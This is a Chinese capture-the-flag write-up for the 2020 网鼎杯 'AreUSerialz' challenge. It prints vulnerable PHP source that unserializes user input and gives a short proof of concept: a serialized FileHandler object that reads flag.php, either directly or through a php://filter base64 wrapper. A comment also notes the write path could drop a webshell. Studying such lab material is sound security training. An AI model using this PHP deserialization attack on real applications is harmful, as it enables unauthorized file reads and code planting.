XXX_WXY
XXX_WXY

[网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz



include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
    
    //根据op值处理
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    //进行文件写入
    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    //可以考虑read读取flag。好像上面的write也可以写shell。先尝试能不能直接读取
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: 
";
        echo $s;
    }
    

    //op强等于“2”设置op等于“1”
    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

//判断是否为可见字符
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

查看代码可以看出来,GET方式传入序列化的str字符串,str字符串中每一个字符的ASCII范围在32到125之间,然后对其反序列化。

在反序列化的过程中,调用__destruct析构方法

析构方法判断为强等于。可以考虑绕过

有一个需要注意的地方是,op, filename, content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。

简单的一种绕过方法是:php7.1+版本对属性类型不敏感,本地序列化的时候将属性改为public进行绕过即可

POC:


class FileHandler {
    public $op = 2;
    public $filename = "flag.php";
//    或者 public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
    public $content;
}

$a = new FileHandler();
$b = serialize($a);
echo($b);

你可能感兴趣的:(信息安全,网络安全,信息安全,安全)

  • CentOS 7.6和7.9建站哪个好? wordpress爱好者 centoslinux运维
    CentOS7.6与7.9:建站选择的深度剖析结论:在决定使用CentOS7.6或7.9进行建站时,没有绝对的“更好”,只有更适合。两者都是稳定、可靠的Linux发行版,但7.9作为更新版本,包含了更多的安全修复和功能改进。对于新项目,选择7.9可能是更明智的选择,因为它提供了最新的安全补丁和优化。然而,如果已有系统基于7.6并且运行良好,升级可能带来的风险和复杂性需要权衡。因此,选择应基于具体需
  • C++重要类型:string类 不是吧啊喂 C++c++开发语言蓝桥杯
    目录前言一、头文件二、定义与赋值1、定义一个空的string对象。2、用一个字符串常量初始化string对象。3、通过复制另一个string对象来初始化。三、访问字符四、内置函数前言在C++中,string类是标准库的一部分,用于处理字符串。它提供了一种更方便、更安全的方式来操作文本数据,相比于C风格的字符串(以char*和一组相关的函数来处理)有很多优势。一、头文件在使用string作为变量类型
  • PenSafe(水洞扫描工具) 不一样的信息安全 工具安全web安全网络安全
    免责声明本系列工具仅供安全专业人员进行已授权环境使用,此工具所提供的功能只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用工具中的功能对任何计算机系统进行入侵操作。利用此工具所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。工具地址:点击领取PenSafe(水洞扫描工具)简介渗透测试安全(PenetrationTesting+Safe):在
  • React Native Sabrina_FN APP测试reactnativereact.jsjavascript
    一、react框架简介:是一个用于构建用户界面的JavaScript库,主要用于构建UI,只专注于实现MVC中View层面的实现特点:声明式设计:使用声明式的编成方式,使得react逻辑足够简化高效:采用VirtualDom(虚拟dom),减少与dom间交互的花费灵活:可以与已知库或者框架很好的配合JSX:执行速度快,类型安全、在编译过程中就能发现错误,像XML的JavaScript语法扩展,编写
  • #渗透测试#网络安全# 一文搞懂什么是木马!!! 独行soc 一文了解网络安全安全网络面试木马病毒
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。目录一、什么是木马木马的定义木马的类型二、如何检测电脑是否感染木马?三、木马与病毒的区别是什么?四、常见的木马传播途径有哪些?五、木马病毒混合体案例分析案例1:CIH病毒与木马结合案例2:熊猫
  • 在 Python 异步协程中使用同步队列 土谷祠房客 python协程阻塞
    在Python异步协程中使用同步队列  使用Pythonasyncio进行异步编程时,可以使用异步队列asyncio.Queue在并发的协程间进行数据交互。不过,asyncio.Queue不是线程安全的,如果需要在不同线程的异步程序之间或者不同线程的异步程序和同步程序间交换数据,就需要使用queue模块中的Queue这个队列,因为它是线程安全的。在asyncio异步协程中使用queue.Queue
  • AWS学习笔记——Chapter5 Identity and Access Management and Security on AWS 坚果壳er AWS学习
    前注:学习书籍IndexIdentityandAccessManagementandSecurityonAWS1.Authentication(认证)2.Authorization(授权)3.Auditing(审核)4.Typesofsecuritycredentials(安全凭证的类型)5.Users6.Groups7.Roles8.IAMHierarchyofPrivileges9.IAMBe
  • AWS SAP-C02教程6--安全_aws sap c02题库(1) 2401_84252743 程序员aws安全区块链
    有AWS管理密钥,因此安全度高AWSKMS与大多数用于加密数据的其他AWS服务集成例题:Acompanyneedstomoveitswrite-intensiveAmazonRDSforPostgreSQLdatabasefromtheeu-west-1Regiontotheeu-north-1Region.Aspartofthemigration,thecompanyneedstochangef
  • 简单谈谈日志审计系统和堡垒机的区别 服务器安全
    日志审计系统和堡垒机有什么区别呢?日志审计系统和堡垒机是两种常见的安全工具,用于加强企业信息系统的安全性。尽管两者都有助于提高安全性,但它们在功能和应用方面有着显著的区别。日志审计系统和堡垒机有什么区别?1.什么是日志审计系统日志审计系统是一种集中管理和分析日志数据的工具。它能够自动收集来自不同设备和应用程序的日志信息,并对其进行存储和分析。通过日志审计系统,管理员能够实时监控系统的活动,并识别潜
  • [如何应对AI API模型弃用:迁移与替代方案策略] wad485486aw 人工智能python
    技术背景介绍在AI技术迅猛发展的背景下,API模型的更新和弃用成为常态。尤其是像Anthropic这样的公司,随着推出更安全、更强大的模型,旧版本的模型往往会被淘汰。这意味着依赖于这些模型的应用程序需要定期更新以保证正常运行。核心原理解析Anthropic模型生命周期包括几个阶段:活跃:模型得到完全支持并推荐使用。遗留:模型不再接收更新,并可能在未来被弃用。已弃用:模型不再对新用户开放,但在退役前
  • 深入浅出:了解TCP协议 可乐泡枸杞· 系统设计必备:你不可不知的20种关键网络协议tcp/ip网络系统架构网络协议
    系统设计中你必须知道的20种网络协议目录探索DHCP协议:自动化网络配置的幕后推手解析ARP协议:网络通信的桥梁探索DNS的奥秘:互联网的幕后英雄理解REST与RESTful:它们有何不同?了解ICMP:网络故障排查的好帮手了解SNMP:网络管理的利器探索RPC协议:分布式系统通信的关键探索SSH协议:安全远程访问的基石探索POP3协议:经典电子邮件通信协议探索IMAP协议:现代电子邮件通信的支柱
  • 脑机接口:信息安全新领域的机遇与挑战 烁月_o9 网络安全web安全其他
    脑机接口:信息安全新领域的机遇与挑战摘要脑机接口(Brain-ComputerInterface,BCI)技术作为连接大脑与外部设备的新兴交互方式,正以前所未有的速度发展,为医疗、娱乐、教育等多领域带来了巨大变革。然而,随着其应用的不断拓展,脑机接口在信息安全方面面临着诸多挑战。本文深入探讨脑机接口技术的发展现状,剖析其在信息安全领域所面临的机遇与挑战,并提出相应的应对策略,旨在为脑机接口技术的安
  • 【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽黑客鹏哥 linux网络安全web安全密码学CTF夺旗赛
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • 【计算机视觉】人脸识别 油泼辣子多加 计算机视觉计算机视觉opencv人工智能
    一、简介人脸识别是将图像或者视频帧中的人脸与数据库中的人脸进行对比,判断输入人脸是否与数据库中的某一张人脸匹配,即判断输入人脸是谁或者判断输入人脸是否是数据库中的某个人。人脸识别属于1:N的比对,输入人脸身份是1,数据库人脸身份数量为N,一般应用在办公室门禁,疑犯追踪;人脸验证属于1:1的比对,输入人脸身份为1,数据库中为同一人的数据,在安全领域应用比较多。一个完整的人脸识别流程主要包括人脸检测、
  • 网络实验——使用GNS3进行NAT配置 浅浅爱默默 网络
    一、NAT1、概念NAT:网络地址转换实现将内网私有IP地址转换为公网IP地址解决公网IP地址数目不足的问题可保护内网IP地址的私密性,起到一定的安全性还可实现企业内多个私有IP网段重叠问题2、NAT分类静态NAT:唯一的私有IP------映射------唯一的公网IP(映射关系确定,永久保存)动态NAT:多个私有IP------映射------多个公网IP(映射关系不确定,向外访问时建立映射关
  • 基于mybatis-plus实现的多租户架构 叔叔很忙 javaspring
    整体概述多租户技术或称多重租赁技术,简称SaaS,是一种软件架构技术,是实现如何在多用户环境下(多用户一般是面向企业用户)共用相同的系统或程序组件,并且可确保各用户间数据的隔离性。多租户在数据存储上主要存在三种方案,独立数据库、共享数据库,独立Schema、共享数据库,共享Schema,共享数据表。独立数据库即一个租户一个数据库,这种方案的用户数据隔离级别最高,安全性最好,但成本较高。优点:为不同
  • IDEA+Java+JSP+Mysql+Tomcat实现Web图书管理系统-添加管理员增删改查功能 omofun5541 javaintellij-ideamysql
    图书名称:图书价格:图书作者:出版公司:添加重置admin_delete.jsp删除图书欢迎您:安全退出admin_detail.jsp图书详情欢迎您:安全退出图书详情返回上一级图书编号图书名称图书价格图书作者图书封皮图书出版社图书列表admin_do_addbook.jsp处理新增图书欢迎您:安全退出admin_do_info.jsp书籍信息”);System.out.println(bookC
  • 区块链的数学基础:核心原理与应用解析 一休哥助手 区块链
    引言区块链技术作为分布式账本系统,成功地解决了传统中心化系统中的信任问题。其背后隐藏着复杂而精妙的数学原理,包括密码学、哈希函数、数字签名、椭圆曲线、零知识证明等。这些数学工具不仅为区块链提供了安全保障,也为智能合约和去中心化应用(DApps)的开发奠定了基础。本文将深入剖析区块链中的核心数学基础,帮助读者理解其工作原理与实际应用。一、区块链数学基础概述区块链的数学基础可以分为以下几个核心领域:密
  • 26. 【.NET 8 实战--孢子记账--从单体到微服务】--需求更新--用户注销、修改用户名、安全设置 喵叔哟 .NET8安全开发语言
    在实际开发过程中,项目需求的变更和增加是常见的情况,因此这篇文章我们就模拟一下项目需求新增的情况。一、需求项目经理今天提出了新的功能,需要增加重置密码、安全设置、修改用户名、注销账户这四个功能,这四个功能必须是独立的(别问为什么用“必须”,有些产品经理就这么离谱),经过讨论整理出了如下大的需求。编号需求说明1重置密码1.输入旧密码、新密码和确认密码;2.旧密码需要验证。2安全设置1.更新邮箱和手机
  • 渗透测试之webshell 蚁剑 流量分析 特性分析 抓包分析 浩浩测试一下 网络安全安全系统安全web安全安全架构网络攻击模型
    目录蚁剑是什么特性简介:蚁剑流量特征两大特征流量分析分析UserAgent数据内容解码分析总结蚁剑是什么蚁剑(AntSword)是一款开源的跨平台WebShell管理工具特性简介:AntSword(蚁剑)是一款开源的网络安全工具,常用于网络渗透测试和攻击。它可以远程连接并控制被攻击计算机,执行命令、上传下载文件等操作。蚁剑与网站进行数据交互的过程中发送的数据是经过编码器编码后再发送支持的编码方式有
  • Redis架构 zyz176
    Redis架构Redis是一个单线程的架构单线程和多线程:单线程效率低,安全多线程效率高,有线程安全问题简化了数据结构和算法的实现:Redis采用了事件模型的机制I/O多路复用机制(Linux处理文件读取的机制)单线程异步回调:node.jsRedis是一个单线程,为什么效率还这么高?redis是基于内存的,他的读取速度本身就很快使用单线程,避免了cpu对线程的切换,在一点程度上提高了效率redi
  • 软件安全工程:AI代码生成的风险评估与防御 前端
    随着软件开发需求的日益增长,提高开发效率成为重中之重。AI写代码工具的出现为软件开发带来了前所未有的机遇,它能够显著提高代码编写速度,降低开发成本。许多工具,例如ScriptEcho(轻微提及,避免过度广告),已经开始在软件开发领域发挥作用。然而,AI代码生成技术也带来了新的安全挑战,我们需要对这些风险进行全面的评估和防御,确保软件的安全性。本文将深入探讨AI代码生成的安全风险,并提出相应的防御策
  • 精通爬虫技术:从入门到入狱——网络数据爬虫的合法性与法律边界
    了解数据爬虫的原理、用途、法律风险与合规性。本文深入解析网络爬虫的工作机制,探讨其在数据采集、搜索引擎等领域的应用。同时,重点关注Robots协议、反爬虫技术、开放数据等合规性问题,并分析相关法律案例,助您合法安全地使用爬虫技术。文章目录什么是网络数据爬虫?数据爬虫的工作原理数据爬虫的应用与影响数据爬虫的广泛用途数据爬虫带来的负面影响和潜在风险数据爬虫的合规性问题开放数据与非开放数据Robots协
  • 如何理解DDoS安全防护在企业安全防护中的作用 服务器安全
    DDoS安全防护在安全防护中扮演着非常重要的角色。DDoS(分布式拒绝服务)攻击是一种常见的网络攻击,旨在通过向目标服务器发送大量请求,以消耗服务器资源并使其无法正常运行。理解DDoS安全防护的作用,可以从以下几个方面来说明:1.维护业务连续性:DDoS攻击可能导致目标服务器过载,甚至无法正常工作,导致业务中断。DDoS安全防护可以帮助企业保持业务连续性,通过识别和过滤恶意流量,保持服务的可用性。
  • 加密DNS有什么用? 域名dns服务器
    在当今数字化高速发展的时代,网络安全和隐私保护成为人们日益关注的焦点。而加密DNS作为一种新兴的技术手段,正逐渐发挥着重要的作用。首先我们先来了解下什么是加密DNS,它究竟是什么?加密DNS(DomainNameSystem),简单来说,是一种对域名系统的查询和响应进行加密保护的技术。加密DNS的出现,使得用户的域名查询更加安全和隐私,减少了因DNS信息泄露而导致的各种网络安全风险。加密DNS有什
  • 如何保障网站数据传输更安全 安全服务器
    在今天的互联网世界中,安全性是用户最为关心的问题之一。随着网络攻击和数据泄露事件的频发,人们越来越意识到选择安全的通信协议的重要性。在众多协议中,HTTPS因其卓越的安全性而逐渐取代了HTTP,成为网络通信的主流方式。HTTPS究竟为何比HTTP更安全呢?1.数据加密:保障传输过程中的安全性HTTPS最大的优势在于其强大的数据加密能力。它通过在HTTP的基础上引入SSL/TLS(安全套接层/传输层
  • 选择网站服务器有哪几种类型? 服务器
    许多用户往往对服务器托管、服务器租用、独享带宽、VPS租用、虚拟主机、云服务器等概念没有很知道,记不清怎样挑选IDC业务,有的一味的认为质量,挑选了费用较高的套餐,但是却浪费资源,没有必要,也有一些用户一味的省钱,没有根据自己公司的实际需求挑选。今天德迅云安全就对于这几类不一样的方案就行一些对比和评估。1、服务器租用服务器租用指得客户不必自身购买服务器,只需依据行业的需要,提起对硬件配置的规定。服
  • 被动扫描和主动扫描的区别 Zero2One. githubjava前端网络安全系统安全
    在网络安全和漏洞检测中,被动扫描和主动扫描是两种常见的技术,它们在工作方式和应用场景上有显著的区别。被动扫描被动扫描是一种在目标无法察觉的情况下进行的信息收集方法。它通过监听网络流量、代理等方式获取数据,而不主动与目标系统进行交互。被动扫描的主要特点是隐蔽性强,不会对目标系统造成干扰1。优点隐蔽性强:由于不主动发送请求,目标系统难以察觉到扫描行为。减少干扰:不会对目标系统的正常运行造成影响。缺点信
  • SimpleHelp远程管理软件 任意文件读取漏洞复现(CVE-2024-57727)(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。0x01产品描述:SimpleHelp是一款远程支持和服务交付软件,它允许技术支持团队通过互联网远程访问和控制客户端计算机,以便进行故障排除、维护和提供技术支持。该软件设计用于简化远程协助过程,提高效率,并减少
  • Java并发编程:线程安全的策略与实践 喵手 零基础学Javajava安全开发语言
    哈喽,各位小伙伴们,你们好呀,我是喵手。运营社区:C站/掘金/腾讯云/阿里云/华为云/51CTO;欢迎大家常来逛逛  今天我要给大家分享一些自己日常学习到的一些知识点,并以文字的形式跟大家一起交流,互相学习,一个人虽可以走的更快,但一群人可以走的更远。  我是一名后端开发爱好者,工作日常接触到最多的就是Java语言啦,所以我都尽量抽业余时间把自己所学到所会的,通过文章的形式进行输出,希望以这种方式
  • 安装数据库首次应用 Array_06 javaoraclesql
    可是为什么再一次失败之后就变成直接跳过那个要求 enter full pathname of java.exe的界面 这个java.exe是你的Oracle 11g安装目录中例如:【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe! 注意第一次,使用SQL D
  • Weblogic Server Console密码修改和遗忘解决方法 bijian1013 Welogic
            在工作中一同事将Weblogic的console的密码忘记了,通过网上查询资料解决,实践整理了一下。 一.修改Console密码         打开weblogic控制台,安全领域 --> myrealm -->&n
  • IllegalStateException: Cannot forward a response that is already committed Cwind javaServlets
    对于初学者来说,一个常见的误解是:当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。 示例代码: protected void doPost() { if (someCondition) { sendRedirect(); } forward(); // Thi
  • 基于流的装饰设计模式 木zi_鸣 设计模式
    当想要对已有类的对象进行功能增强时,可以定义一个类,将已有对象传入,基于已有的功能,并提供加强功能。 自定义的类成为装饰类 模仿BufferedReader,对Reader进行包装,体现装饰设计模式 装饰类通常会通过构造方法接受被装饰的对象,并基于被装饰的对象功能,提供更强的功能。 装饰模式比继承灵活,避免继承臃肿,降低了类与类之间的关系 装饰类因为增强已有对象,具备的功能该
  • Linux中的uniq命令 被触发 linux
    Linux命令uniq的作用是过滤重复部分显示文件内容,这个命令读取输入文件,并比较相邻的行。在正常情 况下,第二个及以后更多个重复行将被删去,行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示,则从标准输入读取。 AD: uniq [选项] 文件 说明:这个命令读取输入文件,并比较相邻的行。在正常情况下,第二个
  • 正则表达式Pattern 肆无忌惮_ Pattern
    正则表达式是符合一定规则的表达式,用来专门操作字符串,对字符创进行匹配,切割,替换,获取。   例如,我们需要对QQ号码格式进行检验 规则是长度6~12位  不能0开头  只能是数字,我们可以一位一位进行比较,利用parseLong进行判断,或者是用正则表达式来匹配[1-9][0-9]{4,14} 或者 [1-9]\d{4,14} &nbs
  • Oracle高级查询之OVER (PARTITION BY ..) 知了ing oraclesql
    一、rank()/dense_rank() over(partition by ...order by ...) 现在客户有这样一个需求,查询每个部门工资最高的雇员的信息,相信有一定oracle应用知识的同学都能写出下面的SQL语句: select e.ename, e.job, e.sal, e.deptno from scott.emp e, (se
  • Python调试 矮蛋蛋 pythonpdb
    原文地址: http://blog.csdn.net/xuyuefei1988/article/details/19399137 1、下面网上收罗的资料初学者应该够用了,但对比IBM的Python 代码调试技巧: IBM:包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试: http://www.ibm.com/d
  • webservice传递自定义对象时函数为空,以及boolean不对应的问题 alleni123 webservice
    今天在客户端调用方法 NodeStatus status=iservice.getNodeStatus(). 结果NodeStatus的属性都是null。 进行debug之后,发现服务器端返回的确实是有值的对象。 后来发现原来是因为在客户端,NodeStatus的setter全部被我删除了。 本来是因为逻辑上不需要在客户端使用setter, 结果改了之后竟然不能获取带属性值的
  • java如何干掉指针,又如何巧妙的通过引用来操作指针————>说的就是java指针 百合不是茶
    C语言的强大在于可以直接操作指针的地址,通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大,初学者很难掌握, java的出现解决了c,c++中指针的问题 java将指针封装在底层,开发人员是不能够去操作指针的地址,但是可以通过引用来间接的操作:   定义一个指针p来指向a的地址(&是地址符号):        
  • Eclipse打不开,提示“An error has occurred.See the log file ***/.log” bijian1013 eclipse
    打开eclipse工作目录的\.metadata\.log文件,发现如下错误: !ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 !MESSAGE Application error !STACK 1 java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai
  • spring aop实例annotation方法实现 bijian1013 javaspringAOPannotation
            在spring aop实例中我们通过配置xml文件来实现AOP,这里学习使用annotation来实现,使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut AdviceMethods.jav
  • [Velocity一]Velocity语法基础入门 bit1129 velocity
    用户和开发人员参考文档 http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html   注释 1.行级注释## 2.多行注释#*  *#   变量定义 使用$开头的字符串是变量定义,例如$var1, $var2,   赋值 使用#set为变量赋值,例
  • 【Kafka十一】关于Kafka的副本管理 bit1129 kafka
    1. 关于request.required.acks   request.required.acks控制者Producer写请求的什么时候可以确认写成功,默认是0, 0表示即不进行确认即返回。 1表示Leader写成功即返回,此时还没有进行写数据同步到其它Follower Partition中 -1表示根据指定的最少Partition确认后才返回,这个在   Th
  • lua统计nginx内部变量数据 ronin47 lua nginx  统计
    server { listen 80; server_name photo.domain.com; location /{set $str $uri; content_by_lua ' local url = ngx.var.uri local res = ngx.location.capture(
  • java-11.二叉树中节点的最大距离 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class MaxLenInBinTree { /* a. 1 / \ 2 3 / \ / \ 4 5 6 7 max=4 pass "root"
  • Netty源码学习-ReadTimeoutHandler bylijinnan javanetty
    ReadTimeoutHandler的实现思路: 开启一个定时任务,如果在指定时间内没有接收到消息,则抛出ReadTimeoutException 这个异常的捕获,在开发中,交给跟在ReadTimeoutHandler后面的ChannelHandler,例如 private final ChannelHandler timeoutHandler = new ReadTim
  • jquery验证上传文件样式及大小(好用) cngolon 文件上传jquery验证
    <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script src="jquery1.8/jquery-1.8.0.
  • 浏览器兼容【转】 cuishikuan css浏览器IE
    浏览器兼容问题一:不同浏览器的标签默认的外补丁和内补丁不同 问题症状:随便写几个标签,不加样式控制的情况下,各自的margin 和padding差异较大。 碰到频率:100% 解决方案:CSS里    *{margin:0;padding:0;} 备注:这个是最常见的也是最易解决的一个浏览器兼容性问题,几乎所有的CSS文件开头都会用通配符*来设
  • Shell特殊变量:Shell $0, $#, $*, $@, $?, $$和命令行参数 daizj shell$#$?特殊变量
    前面已经讲到,变量名只能包含数字、字母和下划线,因为某些包含其他字符的变量有特殊含义,这样的变量被称为特殊变量。例如,$ 表示当前Shell进程的ID,即pid,看下面的代码: $echo $$ 运行结果 29949   特殊变量列表 变量 含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数。n 是一个数字,表示第几个参数。例如,第一个
  • 程序设计KISS 原则-------KEEP IT SIMPLE, STUPID! dcj3sjt126com unix
    翻到一本书,讲到编程一般原则是kiss:Keep It Simple, Stupid.对这个原则深有体会,其实不仅编程如此,而且系统架构也是如此。 KEEP IT SIMPLE, STUPID! 编写只做一件事情,并且要做好的程序;编写可以在一起工作的程序,编写处理文本流的程序,因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律,高明的工程师的神圣的“KISS 原
  • android Activity间List传值 dcj3sjt126com Activity
    第一个Activity: import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a
  • tomcat 设置java虚拟机内存 eksliang tomcat 内存设置
    转载请出自出处:http://eksliang.iteye.com/blog/2117772 http://eksliang.iteye.com/ 常见的内存溢出有以下两种: java.lang.OutOfMemoryError: PermGen space java.lang.OutOfMemoryError: Java heap space   ------------
  • Android 数据库事务处理 gqdy365 android
    使用SQLiteDatabase的beginTransaction()方法可以开启一个事务,程序执行到endTransaction() 方法时会检查事务的标志是否为成功,如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务,如果没有调用setTransactionSuccessful() 方法则回滚事务。事
  • Java 打开浏览器 hw1287789687 打开网址open浏览器open browser打开url打开浏览器
    使用java 语言如何打开浏览器呢? 我们先研究下在cmd窗口中,如何打开网址 使用IE 打开 D:\software\bin>cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 使用火狐打开 D:\software\bin>cmd /c start firefox http://hw1287789
  • ReplaceGoogleCDN:将 Google CDN 替换为国内的 Chrome 插件 justjavac chromeGooglegoogle apichrome插件
    Chrome Web Store 安装地址: https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 由于众所周知的原因,只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样,通过script标记引用这些资源,让网站访问速度瞬间提速吧
  • 进程VS.线程 m635674608 线程
    资料来源: http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点: 多进程模式最大
  • Linux下安装MemCached 字符串 memcached
    前提准备:1. MemCached目前最新版本为:1.4.22,可以从官网下载到。2. MemCached依赖libevent,因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令,查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n
  • java设计模式之--jdk动态代理(实现aop编程) Supanccy2013 javaDAO设计模式AOP
        与静态代理类对照的是动态代理类,动态代理类的字节码在程序运行时由Java反射机制动态生成,无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作,而且提高了软件系统的可扩展性,因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 &
  • Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持 wiselyman spring 4
    2.1 默认方法(default method) java8引入了一个default medthod; 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 使用default关键字 Spring 4.2支持加载在默认方法里声明的bean 2.2 将要被声明成bean的类 public class DemoService {
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他